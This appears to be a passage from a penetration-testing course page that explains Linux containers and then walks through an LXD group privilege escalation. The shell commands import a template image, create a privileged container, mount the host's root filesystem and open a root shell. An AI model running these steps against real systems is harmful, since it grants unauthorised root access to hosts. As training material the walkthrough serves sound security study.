## Containers

### Linux Containers

Linux Containers (LXC) is an operating system-level virtualization technique that allows multiple Linux systems to run in isolation from each other on a single host by owning their own processes but sharing the host system kernel for them. LXC is very popular due to its ease of use and has become an essential part of IT security.

By default, LXC consume fewer resources than a virtual machine and have a standard interface, making it easy to manage multiple containers simultaneously. A platform with LXC can even be organized across multiple clouds, providing portability and ensuring that applications running correctly on the developer's system will work on any other system. In addition, large applications can be started, stopped, or their environment variables changed via the Linux container interface.

The ease of use of LXC is their most significant advantage compared to classic virtualization techniques. However, the enormous spread of LXC, an almost all-encompassing ecosystem, and innovative tools are primarily due to the Docker platform, which established Linux containers. The entire setup, from creating container templates and deploying them, configuring the operating system and networking, to deploying applications, remains the same.
Linux Daemon

Linux Daemon (LXD) [LXD](https://github.com/lxc/lxd) is similar in some respects but is designed to contain a complete operating system. Thus it is not an application container but a system container. Before we can use this service to escalate our privileges, we must be in either the lxc or lxd group. 

We can find this out with the following command:

```bash
container-user@nix02:~$ id

uid=1000(container-user) gid=1000(container-user) groups=1000(container-user),116(lxd)
```

From here on, there are now several ways in which we can exploit LXC/LXD. We can either create our own container and transfer it to the target system or use an existing container. Unfortunately, administrators often use templates that have little to no security. This attitude has the consequence that we already have tools that we can use against the system ourselves.

```bash
container-user@nix02:~$ cd ContainerImages
container-user@nix02:~$ ls

ubuntu-template.tar.xz
```

Such templates often do not have passwords, especially if they are uncomplicated test environments. These should be quickly accessible and uncomplicated to use. The focus on security would complicate the whole initiation, make it more difficult and thus slow it down considerably. If we are a little lucky and there is such a container on the system, it can be exploited. For this, we need to import this container as an image.

```bash
container-user@nix02:~$ lxc image import ubuntu-template.tar.xz --alias ubuntutemp
container-user@nix02:~$ lxc image list

+-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+
|                ALIAS                | FINGERPRINT  | PUBLIC |               DESCRIPTION               | ARCHITECTURE |      TYPE       |   SIZE    |          UPLOAD DATE          |
+-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+
| ubuntu/18.04 (v1.1.2)               | 623c9f0bde47 | no    | Ubuntu bionic amd64 (20221024_11:49)     | x86_64       | CONTAINER       | 106.49MB  | Oct 24, 2022 at 12:00am (UTC) |
+-------------------------------------+--------------+--------+-----------------------------------------+--------------+-----------------+-----------+-------------------------------+
```

After verifying that this image has been successfully imported, we can initiate the image and configure it by specifying the security.privileged flag and the root path for the container. This flag disables all isolation features that allow us to act on the host.

```bash
container-user@nix02:~$ lxc init ubuntutemp privesc -c security.privileged=true
container-user@nix02:~$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
```

Once we have done that, we can start the container and log into it. In the container, we can then go to the path we specified to access the resource of the host system as root.

```bash
container-user@nix02:~$ lxc start privesc
container-user@nix02:~$ lxc exec privesc /bin/bash
root@nix02:~# ls -l /mnt/root
```